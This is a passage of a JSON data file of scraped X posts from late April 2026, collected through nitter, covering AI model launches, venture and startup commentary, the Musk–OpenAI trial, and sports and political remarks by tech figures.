six feet deep — like a grave.\n\nMy guess is they will unsuccessfully argue that @Comey intended the second definition—which is insane. \n\nComey obviously wasn’t telling folks to assassinate anyone and he apologized quickly for sharing the photo. \n https://x.com/nicksortor/status/2049223116052697589/video/1", + "url": "https://x.com/jason/status/2049278984513310783", + "published_at": "2026-04-29T00:05:58+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", + "url": "https://x.com/lxfater/status/2049278935897186512", + "published_at": "2026-04-29T00:05:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especially for public companies.\"\n\nDo you think that layoffs will solve the problem of many doing them @jasonlk @AnjneyMidha @GergelyOrosz @AustinGeorgas", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "published_at": "2026-04-29T00:05:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", + "url": "https://x.com/jason/status/2049275346109796388", + "published_at": "2026-04-28T23:51:30+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", + "url": "https://x.com/berryxia/status/2049275291164692726", + "published_at": "2026-04-28T23:51:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow we feeling tonight?!?!\n\n📷cc some @ATLHawks fans please 📷 🫡", + "url": "https://x.com/jason/status/2049275070800150851", + "published_at": "2026-04-28T23:50:25+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100% 本地隐私 + 免费社区 API\n\n真正的实时、自然人机交互时代来了!🔥\n\n技术报告、GitHub、HuggingFace、Web Demo 已开放。", + "url": "https://x.com/berryxia/status/2049274065610027362", + "published_at": "2026-04-28T23:46:25+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 push 的代码,第一时间能看到的只有 watcher 里那几个人。\n\n想真正跟进一个 repo:Watch + Releases only 最佳档。Watch All 太吵,Star 没用。", + "url": "https://x.com/runes_leo/status/2049271946022474215", + "published_at": "2026-04-28T23:38:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", + "url": "https://x.com/dingyi/status/2049262208241332358", + "published_at": "2026-04-28T22:59:18+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", + "url": "https://x.com/berryxia/status/2049260222863266206", + "published_at": "2026-04-28T22:51:25+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", + "url": "https://x.com/berryxia/status/2049260211895185445", + "published_at": "2026-04-28T22:51:22+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", + "url": "https://x.com/berryxia/status/2049259518027276559", + "published_at": "2026-04-28T22:48:37+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statements about SpaceX and Elon Musk\n• It formally apologizes for those remarks\n• Agrees it will not consider political views or speech in future regulatory decisions\n• The Commission will NOT require coastal permits for most launch operations at Vandenberg\n\nFull statement: \"The Commission agrees that it may not consider irrelevant factors in performing its function and specifically agrees that it will not take into account the perceived political beliefs, political speech, or labor practices of SpaceX or its officers in considering any regulatory action concerning SpaceX. The Commission acknowledges that Commissioners made statements, including during their October 10, 2024, hearing on the Base’s Falcon 9 launch program, that showed political bias against SpaceX and its CEO and were improper. The Commission apologizes for those statements, as set forth in the signed letter attached as Exhibit C.\"\n\nThis filing means that SpaceX and the California Coastal Commission have reached a settlement in their federal lawsuit, and it provides long-term regulatory clarity for SpaceX for future Falcon 9 launches.", + "url": "https://x.com/elonmusk/status/2049259466973933764", + "published_at": "2026-04-28T22:48:24+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", + "url": "https://x.com/berryxia/status/2049255217603178794", + "published_at": "2026-04-28T22:31:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", + "url": "https://x.com/jason/status/2049254554550653047", + "published_at": "2026-04-28T22:28:53+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", + "url": "https://x.com/berryxia/status/2049254052840812960", + "published_at": "2026-04-28T22:26:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dragged down in organizations full of B and C players.\"\n\nCan you have a team of only A players @Carles_Reina @rabois @bhalligan @GuptaRK22", + "url": "https://x.com/HarryStebbings/status/2049253323329704378", + "published_at": "2026-04-28T22:24:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", + "url": "https://x.com/berryxia/status/2049253021159403786", + "published_at": "2026-04-28T22:22:48+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", + "url": "https://x.com/svwang1/status/2049252535689757003", + "published_at": "2026-04-28T22:20:52+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", + "url": "https://x.com/berryxia/status/2049252532015579248", + "published_at": "2026-04-28T22:20:51+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: huggingface.co/poolside/Lagu…", + "url": "https://x.com/berryxia/status/2049250788422353142", + "published_at": "2026-04-28T22:13:55+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", + "url": "https://x.com/berryxia/status/2049250710492160228", + "published_at": "2026-04-28T22:13:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", + "url": "https://x.com/berryxia/status/2049249868376604931", + "published_at": "2026-04-28T22:10:16+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加入 Blender Development Fund,支持开源 3D 软件发展\n\n创意工作者和 3D/设计/音乐/视频玩家,这波更新太香了!", + "url": "https://x.com/berryxia/status/2049247904536428805", + "published_at": "2026-04-28T22:02:28+00:00", + "source": "nitter", + "title_zh": "Claude推出融合Blender、Autodesk Fusion等多领域专业工具的对话连接器,实现3D建模与设计流程的智能化协作,并加入Blender开发基金支持开源生态。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Wow. Musk’s lawyers will capitalize on this.", + "url": "https://x.com/GaryMarcus/status/2049243836359254025", + "published_at": "2026-04-28T21:46:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", + "url": "https://x.com/GaryMarcus/status/2049243406380237116", + "published_at": "2026-04-28T21:44:35+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Image", + "url": "https://x.com/sama/status/2049241518540808440", + "published_at": "2026-04-28T21:37:05+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the World Models workshop.\n- Dual Perspectives on non-Contrastive SSL https://arxiv.org/abs/2507.01028: Presented as a poster.\n-> I’m already working on two follow-ups to these, so stay tuned for more on that 😉\n\nI was genuinely impressed by the quality of the discussions during the poster sessions. A huge thanks to everyone who stopped by our poster to debate the details, and to those who attended the talk 🙏\nI’m leaving Rio with a lot of new research ideas and potential collaborations. This week really made my motivation to keep pushing papers and staying active in the community even stronger for the rest of my PhD 🚀\n\nAnother highlight was the socials, specifically the @amilabs mixer. It was exciting to see AMI’s first official public event go so well—it definitely felt like we put AMI “on the map” for a lot of people.\n\nThanks again to my co-authors 🙏:\n- EB-JEPA: @randall_balestr, @megdrv, @DavidJFan, @garridoq_, @TusharNagarajan, @koustuvsinha, @kevinghstz , Mike Rabbat, @ylecun, @_amirbar\n- Dual Perspectives on NC-SSL: Jean Ponce, @MichaelArbel, Martial Hebert", + "url": "https://x.com/ylecun/status/2049241361266684288", + "published_at": "2026-04-28T21:36:28+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Very specialised in what they want. Not nearly big enough demand side for the supply of venture backed companies. \n\n3. Private Equity: More closed than ever. Thoma, Francisco, Clearlake are on a portfolio of zombies that will likely follow the same fate as Medallia. Will cause them to pull back significantly from SaaS M&A. \n\nThis is not good.", + "url": "https://x.com/HarryStebbings/status/2049237538901020767", + "published_at": "2026-04-28T21:21:16+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", + "url": "https://x.com/sama/status/2049235284655780000", + "published_at": "2026-04-28T21:12:19+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is not that LLMs are useless or unintelligent but that they think differently from humans, lacking explicit knowledge of reality and instead amalgamating billions of statistical generalizations. https://open.substack.com/pub/garymarcus/p/chatgpts-powerful-new-image-engine?utm_campaign=post-expanded-share&utm_medium=web", + "url": "https://x.com/GaryMarcus/status/2049233910266278250", + "published_at": "2026-04-28T21:06:51+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", + "url": "https://x.com/paulg/status/2049226946471489602", + "published_at": "2026-04-28T20:39:11+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "There are some real bombshells in this one.", + "url": "https://x.com/paulg/status/2049226128603172949", + "published_at": "2026-04-28T20:35:56+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", + "url": "https://x.com/paulg/status/2049225204132421727", + "published_at": "2026-04-28T20:32:16+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe companies that win will rebuild with AI in mind, not layer it onto old structures.\"\n\nWhat role does not exist today but will be common in 5 years time @karrisaarinen @benioff @levie @dharmesh", + "url": "https://x.com/HarryStebbings/status/2049224886128722345", + "published_at": "2026-04-28T20:31:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2049223746368483370", + "published_at": "2026-04-28T20:26:28+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "“YouTube videos about AI, but with no soyface”", + "url": "https://x.com/pmarca/status/2049222212008206717", + "published_at": "2026-04-28T20:20:22+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initial system in 2006, which provided a huge leap forward in quality because it used a much larger 5-gram language model trained on trillions of words of text (indeed, probably the first trillion token language model training in the world: paper has some nice heads showing scaling-law-like quality improvement from scaling to more data/compute).\n\nSee \"Large Language Models in Machine Translation\", Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och and Jeffrey Dean, https://aclanthology.org/D07-1090/\n\nThe second major collaboration was in 2016 when we moved Translate over from a statistical machine translation approach to using deep neural networks.  This approach relied on two key innovations.  The first was Google's work on Sequence-to-Sequence models (https://arxiv.org/abs/1409.3215).  The second was our development of TPUs, custom cups that improved the performance of inference for deep neural networks by 30-80X over existing CPUs and GPUs of the day (and reduced latency by 15-30X).  This made launching compute-intensive language model services like Translate feasible for hundreds of millions of users. See \"In-Datacenter Performance Analysis of a Tensor Processing Unit\",  Norman P. Jouppi et al.  https://arxiv.org/abs/1704.04760\n\nGNMT paper:\n\"Google's Neural Machine Translation System: Bridging the Gap between Human and Machine Translation\",  Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Łukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean, https://arxiv.org/abs/1609.08144\n\nMost recently, we have advanced Translate further using Gemini models.\n\nEach of these advances relied on research that have major quality leaps over the existing status quo translation approaches, bringing better quality and connectedness to all of our Translate users! 🎉", + "url": "https://x.com/JeffDean/status/2049221200321380805", + "published_at": "2026-04-28T20:16:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", + "url": "https://x.com/jason/status/2049216863574364182", + "published_at": "2026-04-28T19:59:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", + "url": "https://x.com/jason/status/2049216735912329567", + "published_at": "2026-04-28T19:58:37+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", + "url": "https://x.com/jason/status/2049215999795138656", + "published_at": "2026-04-28T19:55:41+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", + "url": "https://x.com/jason/status/2049215583351341460", + "published_at": "2026-04-28T19:54:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "AutoLane is my next uber.", + "url": "https://x.com/jason/status/2049215140810072429", + "published_at": "2026-04-28T19:52:16+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", + "url": "https://x.com/jason/status/2049215070970814469", + "published_at": "2026-04-28T19:52:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", + "url": "https://x.com/jason/status/2049214864912978399", + "published_at": "2026-04-28T19:51:11+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", + "url": "https://x.com/charliebilello/status/2049214106352107778", + "published_at": "2026-04-28T19:48:10+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂", + "url": "https://x.com/runes_leo/status/2049209546091253870", + "published_at": "2026-04-28T19:30:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.", + "url": "https://x.com/GaryMarcus/status/2049202338209079574", + "published_at": "2026-04-28T19:01:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": ".@ZohranKMamdani is about to kill the Golden Goose", + "url": "https://x.com/jason/status/2049200471651353064", + "published_at": "2026-04-28T18:53:59+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", + "url": "https://x.com/CuiMao/status/2049198015232315465", + "published_at": "2026-04-28T18:44:13+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓\n\n话不多说,看图。提示词见引用文章。", + "url": "https://x.com/Pluvio9yte/status/2049197606619017697", + "published_at": "2026-04-28T18:42:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "might not be accurate for much longer...", + "url": "https://x.com/jason/status/2049195328092471563", + "published_at": "2026-04-28T18:33:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The Best Founders are Not Motivated by Money:\n\n\"Founders don't tend to be motivated by money as well.\nThe best are motivated by personal growth development, being inspired, finding things intellectually stimulating, and winning.\n\nBut it never tends to be money. Money is a very tough thing to be continuously motivated by.\n\nEventually, you will reach a point where money's no longer a motivator and then you need to find something else.\"\n\nLove to hear your thoughts on this @rabois @howard @dafrankel @alanchanguk @awxjack", + "url": "https://x.com/HarryStebbings/status/2049193932144164986", + "published_at": "2026-04-28T18:28:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", + "url": "https://x.com/pmarca/status/2049193915249574141", + "published_at": "2026-04-28T18:27:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases?", + "url": "https://x.com/pmarca/status/2049193427120603173", + "published_at": "2026-04-28T18:25:59+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Looks like we've successfully ragebaited the CCP 🫠", + "url": "https://x.com/jason/status/2049191806135324774", + "published_at": "2026-04-28T18:19:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Asking AI to ask questions is hugely underrated.", + "url": "https://x.com/pmarca/status/2049188549342138449", + "published_at": "2026-04-28T18:06:36+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "American Intelligence", + "url": "https://x.com/pmarca/status/2049188427921334606", + "published_at": "2026-04-28T18:06:07+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Found the AI killer app.", + "url": "https://x.com/pmarca/status/2049183253764936068", + "published_at": "2026-04-28T17:45:34+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Google, 2001: Don’t Be Evil\nGoogle, 2026: How much does mass surveillance pay?", + "url": "https://x.com/GaryMarcus/status/2049171957250207936", + "published_at": "2026-04-28T17:00:41+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "So good!", + "url": "https://x.com/dingyi/status/2049171494329065493", + "published_at": "2026-04-28T16:58:50+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "我现在基本不太直接用 Agent了。\n介绍下我的AI 搭档,Finn。\n现在大部分情况是 Finn 让 Agent 去干活。\n\n工作流其实挺简单的:\n我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。\n\n然后直接丢给 OpenClaw,后面基本就不太管了\n\n这一步挺关键的。\n\n不然你会发现一个很烦的事情:\n你要跟一堆 Agent 来回对话,有时候都找不到有那个 MD 的文件夹在哪,很快就乱了。\n\n换了这种模式后我现在基本只做一件事:提需求\n\n剩下的 Finn 自己去搞,他会先跟我确认好需求,就安排其他 Agent 去干了。\n\n而且我已经把一整套东西接进来了,Obsidian、Google Workspace、iCloud、飞书、github、Cloudflare 等,各种表格和自动化流程。\n\n如果你还在一个个 Agent 聊天,其实有一个悖论,以为自己在用 AI,但本质上只是换了一套更聪明的工具。\n\n安全我也跑了一段时间,我现在的做法挺克制的:白名单 + 审计 + 能力边界,不给乱权限,主要让它长期跑那些稳定的事情。\n\n目前看,是稳的。\n\n有一个很直观的变化,这套东西一旦跑顺了,真的很难再回去什么都自己聊自己盯。\n\n比如最近我用 Codex 对好了将近一年的烂账,然后形成了一个固定的 skill 交给了 OpenClaw,现在跟他说一句,就能把所有的表填的明明白白,还能在固定时间盘点,发邮件。\n所以 Finn 现在是我的私人助理,财务总监,技术总监等角色集大成者。", + "url": "https://x.com/frxiaobei/status/2049170782170042513", + "published_at": "2026-04-28T16:56:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。\n\nhttps://poolside.ai/", + "url": "https://x.com/dingyi/status/2049166818452160778", + "published_at": "2026-04-28T16:40:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": 